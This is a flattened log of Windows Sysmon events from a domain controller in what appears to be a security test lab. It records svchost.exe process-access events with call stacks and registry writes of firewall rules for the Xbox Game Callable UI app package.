13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000011075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.774{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|M=microsoft.xboxgamecallableui_cw5n1h2txyewy|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|D=C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\|PFN=Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000011074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.774{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B07A1A03-FAD3-4152-8578-2E570A6EF22F}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000011073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.774{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B42DA77E-909D-40CB-8A97-0C7073DE830F}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 13241300x800000000000000011072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.774{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{780252E5-2381-486F-8BF3-78FD780D7099}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 13241300x800000000000000011071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.774{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{70B7A482-2497-482F-B926-BD566E03D19C}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 10341000x800000000000000011070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 